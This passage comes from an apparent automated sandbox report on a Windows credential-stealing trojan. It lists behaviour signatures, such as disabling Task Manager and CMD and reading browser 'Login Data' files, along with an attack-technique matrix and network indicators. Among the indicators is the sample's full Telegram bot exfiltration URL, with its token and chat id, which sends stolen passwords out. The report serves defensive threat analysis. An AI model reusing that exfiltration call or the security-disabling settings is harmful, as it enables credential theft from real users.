              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 599094Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 598984Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 598875Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 598765Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 598656Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 598547Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 598437Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 598328Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 598218Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 598109Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 598000Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 597889Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 597781Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 597672Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 597547Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 597437Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 597328Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 597219Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 597094Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 596984Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 596873Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 596765Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 596656Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 596547Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 596437Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 596328Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 596219Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 596109Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 596000Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 595890Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 595781Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 595672Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 595562Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 595446Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 595343Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 595234Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 595124Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 595015Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 594906Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 594797Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 594687Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 594578Jump to behavior
              Source: grrezORe7h.exe, 00000004.00000002.2991916769.0000000003FAD000.00000004.00000020.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.2991916769.0000000003F58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: grrezORe7h.exe, 00000004.00000002.2991916769.0000000003FAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0Edh
              Source: C:\Users\user\Desktop\grrezORe7h.exeAPI call chain: ExitProcess graph end nodegraph_0-3943
              Source: C:\Users\user\Desktop\grrezORe7h.exeAPI call chain: ExitProcess graph end nodegraph_0-3762
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess created: C:\Users\user\Desktop\grrezORe7h.exe "C:\Users\user\Desktop\grrezORe7h.exe"Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeQueries volume information: C:\Users\user\Desktop\grrezORe7h.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 0_2_00406077 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406077
              Source: C:\Users\user\Desktop\grrezORe7h.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Source: C:\Users\user\Desktop\grrezORe7h.exeRegistry value created: DisableTaskMgr 1Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeRegistry value created: DisableCMD 1Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: grrezORe7h.exe PID: 7776, type: MEMORYSTR
              Source: Yara matchFile source: 00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: grrezORe7h.exe PID: 7776, type: MEMORYSTR
              Source: C:\Users\user\Desktop\grrezORe7h.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: Yara matchFile source: 00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: grrezORe7h.exe PID: 7776, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: grrezORe7h.exe PID: 7776, type: MEMORYSTR
              Source: Yara matchFile source: 00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: grrezORe7h.exe PID: 7776, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Native API
              1
              DLL Side-Loading
              1
              Access Token Manipulation
              1
              Masquerading
              1
              OS Credential Dumping
              21
              Security Software Discovery
              Remote Services1
              Email Collection
              1
              Web Service
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
              Process Injection
              31
              Disable or Modify Tools
              LSASS Memory31
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol1
              Archive Collected Data
              21
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading
              31
              Virtualization/Sandbox Evasion
              Security Account Manager1
              Application Window Discovery
              SMB/Windows Admin Shares1
              Data from Local System
              1
              Ingress Tool Transfer
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Access Token Manipulation
              NTDS1
              System Network Configuration Discovery
              Distributed Component Object Model1
              Clipboard Data
              3
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Process Injection
              LSA Secrets2
              File and Directory Discovery
              SSHKeylogging14
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Deobfuscate/Decode Files or Information
              Cached Domain Credentials215
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
              Obfuscated Files or Information
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              grrezORe7h.exe55%ReversingLabsWin32.Ransomware.TelegramRAT
              grrezORe7h.exe68%VirustotalBrowse
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\nsuC465.tmp\System.dll0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://api.telegram.orgFrH0%Avira URL Cloudsafe
              http://checkip.dyndns.orgH0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              drive.google.com
              142.250.181.238
              truefalse
                high
                drive.usercontent.google.com
                142.250.185.225
                truefalse
                  high
                  reallyfreegeoip.org
                  104.21.96.1
                  truefalse
                    high
                    api.telegram.org
                    149.154.167.220
                    truefalse
                      high
                      checkip.dyndns.com
                      193.122.6.168
                      truefalse
                        high
                        checkip.dyndns.org
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189false
                              high
                              http://checkip.dyndns.org/false
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://api.telegram.orggrrezORe7h.exe, 00000004.00000002.3012744348.000000003476C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003495C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.0000000034627000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000346FD000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003472D000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003463C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000347B6000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000348D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org/botgrrezORe7h.exe, 00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382grrezORe7h.exe, 00000004.00000002.3012744348.00000000348D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://translate.google.com/translate_a/element.jsgrrezORe7h.exe, 00000004.00000003.2238578202.0000000003FCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://checkip.dyndns.orgHgrrezORe7h.exe, 00000004.00000002.3012744348.000000003476C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://checkip.dyndns.org/SgrrezORe7h.exe, 00000004.00000003.2880307100.0000000036E5E000.00000004.00000020.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3014530258.0000000036E37000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://drive.usercontent.google.com/grrezORe7h.exe, 00000004.00000003.2270597506.0000000003FCD000.00000004.00000020.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.2991916769.0000000003FAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://checkip.dyndns.orggrrezORe7h.exe, 00000004.00000002.3012744348.000000003476C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003495C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003472D000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.0000000034561000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000347B6000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000348D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://nsis.sf.net/NSIS_ErrorErrorgrrezORe7h.exefalse
                                                high
                                                https://drive.usercontent.google.com/PgrrezORe7h.exe, 00000004.00000003.2270597506.0000000003FCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.google.comgrrezORe7h.exe, 00000004.00000003.2238578202.0000000003FCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://drive.google.com/grrezORe7h.exe, 00000004.00000002.2991916769.0000000003F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://checkip.dyndns.org/.dgrrezORe7h.exe, 00000004.00000002.3014530258.0000000036E28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://api.telegram.orgFrHgrrezORe7h.exe, 00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://api.telegramgrrezORe7h.exe, 00000004.00000002.3012744348.00000000348D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://reallyfreegeoip.orggrrezORe7h.exe, 00000004.00000002.3012744348.0000000034591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://apis.google.comgrrezORe7h.exe, 00000004.00000003.2238578202.0000000003FCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://drive.usercontent.google.com/Y40hgrrezORe7h.exe, 00000004.00000003.2270597506.0000000003FCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://checkip.dyndns.comgrrezORe7h.exe, 00000004.00000002.3012744348.000000003476C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003495C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000347B6000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000348D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://api.telegram.orggrrezORe7h.exe, 00000004.00000002.3012744348.000000003476C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003495C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003472D000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000347B6000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000348D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namegrrezORe7h.exe, 00000004.00000002.3012744348.0000000034561000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://reallyfreegeoip.org/xml/8.46.123.189.SHgrrezORe7h.exe, 00000004.00000002.3012744348.0000000034591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://checkip.dyndngrrezORe7h.exe, 00000004.00000002.3012744348.000000003495C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://reallyfreegeoip.org/xml/grrezORe7h.exe, 00000004.00000002.3012744348.0000000034591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs
                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            142.250.181.238
                                                                            drive.google.comUnited States
                                                                            15169GOOGLEUSfalse
                                                                            149.154.167.220
                                                                            api.telegram.orgUnited Kingdom
                                                                            62041TELEGRAMRUfalse
                                                                            193.122.6.168
                                                                            checkip.dyndns.comUnited States
                                                                            31898ORACLE-BMC-31898USfalse
                                                                            104.21.96.1
                                                                            reallyfreegeoip.orgUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            142.250.185.225
                                                                            drive.usercontent.google.comUnited States
                                                                            15169GOOGLEUSfalse
                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                            Analysis ID:1588933
                                                                            Start date and time:2025-01-11 07:22:07 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 7m 13s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:6
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:grrezORe7h.exe
                                                                            renamed because original name is a hash value
                                                                            Original Sample Name:ad084a1c285369520a48712abaef5ebb566572f32e345d7e2356ada3fea0473f.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@3/8@5/5
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HCA Information:
                                                                            • Successful, ratio: 95%
                                                                            • Number of executed functions: 139
                                                                            • Number of non-executed functions: 108
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            TimeTypeDescription
                                                                            01:24:07API Interceptor26517x Sleep call for process: grrezORe7h.exe modified
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            149.154.167.22014lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                              Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                              YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                193.122.6.168ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                prgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                h1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                reallyfreegeoip.org14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                • 104.21.32.1
                                                                                                Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                • 104.21.64.1
                                                                                                ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 104.21.32.1
                                                                                                sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 104.21.64.1
                                                                                                3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 104.21.16.1
                                                                                                lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 104.21.112.1
                                                                                                5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 104.21.112.1
                                                                                                prgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 104.21.112.1
                                                                                                rlPy5vt1Dg.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 104.21.48.1
                                                                                                wZ6VEnOkie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 104.21.80.1
                                                                                                checkip.dyndns.com14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                • 132.226.247.73
                                                                                                Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                • 193.122.130.0
                                                                                                ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 193.122.6.168
                                                                                                sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 158.101.44.242
                                                                                                3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 158.101.44.242
                                                                                                lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 158.101.44.242
                                                                                                5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 158.101.44.242
                                                                                                prgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 193.122.6.168
                                                                                                rlPy5vt1Dg.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 132.226.247.73
                                                                                                wZ6VEnOkie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 132.226.247.73
                                                                                                api.telegram.org14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                • 149.154.167.220
                                                                                                Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                • 149.154.167.220
                                                                                                ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                • 149.154.167.220
                                                                                                n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                • 149.154.167.220
                                                                                                YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                ORACLE-BMC-31898USQg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                • 193.122.130.0
                                                                                                ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 193.122.6.168
                                                                                                sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 158.101.44.242
                                                                                                3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 158.101.44.242
                                                                                                lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
